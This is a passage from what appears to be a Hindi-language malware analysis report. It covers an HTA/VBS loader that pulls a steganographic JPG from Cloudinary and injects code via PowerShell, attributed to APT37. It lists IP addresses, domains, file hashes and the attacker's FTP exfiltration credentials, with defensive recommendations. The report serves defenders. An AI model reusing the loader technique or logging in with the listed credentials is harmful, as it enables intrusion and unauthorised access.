  • PowerShell ने SeDebugPrivilege सक्षम किया और कोड इंजेक्शन के लिए WriteProcessMemory का उपयोग किया VBS फ़ाइल ने Cloudinary से एक JPG डाउनलोड किया। JPG में <BASE64_START> और <BASE64_END> टैग के बीच छिपा हुआ Base64 डेटा था। स्क्रिप्ट ने इस डेटा को निकाला, इसे उलटा (reversed), और एक .NET असेंबली में डिकोड किया। यह असेंबली मेमोरी में लोड की गई और निष्पादित की गई। यद्यपि हम JPG डाउनलोड नहीं कर सके (401 त्रुटि), कोड दृढ़ता से सुझाव देता है कि यह वही तंत्र था जिसने अंतिम पेलोड (foeMMBIG.txt) डाउनलोड किया।

धमकी देने वाला कलाकार: APT37 – तकनीकें ज्ञात TTPs से मेल खाती हैं

14.2 समझौता संकेतक (Indicators of Compromise)

IP पते:

IP = 107.172.31.5 | भूमिका = C2 सर्वर (VBS, TXT डाउनलोड) IP = 89.39.83.184 | भूमिका = FTP एक्सफ़िल्ट्रेशन सर्वर IP = 192.3.27.144 | भूमिका = HTA डाउनलोड स्रोत IP = 104.17.201.1 | भूमिका = पहले चरण का डाउनलोड (3 MB) GreyNoise से 25 दुर्भावनापूर्ण IP | पूरी सूची के लिए धारा 9.2 देखें

डोमेन:

डोमेन = res.cloudinary.com भूमिका = स्टेग्नोग्राफ़ी (छिपे हुए कोड वाला JPG) डोमेन = ip-api.com फ़ाइल नाम = index.B23BDC8E.txt(गलत) भूमिका = सैंडबॉक्स चोरी जांच

फ़ाइल हैश:

(seemebestthing…).hta MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

comostraints.vbs MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

foeMMBIG.txt MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82

FTP क्रेडेंशियल्स:

  • उपयोगकर्ता नाम: [email protected]
  • पासवर्ड: e)rwKbkKP8-m0

14.3 सिफारिशें

  • IOC अनुभाग में सूचीबद्ध सभी IP और डोमेन को ब्लॉक करें
  • समान C2 बुनियादी ढांचे का पता लगाने के लिए JA3/JA4 फिंगरप्रिंट की निगरानी करें
  • अपने SIEM में सिग्मा नियम (धारा 13 देखें) का उपयोग करें
  • उपयोगकर्ताओं को HTA फ़ाइलें वितरित करने वाले फ़िशिंग हमलों पर प्रशिक्षित करें
  • पावरशेल लॉगिंग सक्षम करें और SeDebugPrivilege उपयोग की निगरानी करें
  • समान प्रक्रिया इंजेक्शन पैटर्न वाले किसी भी होस्ट को अलग करें और जांच करें
टूल डाउनलोड करें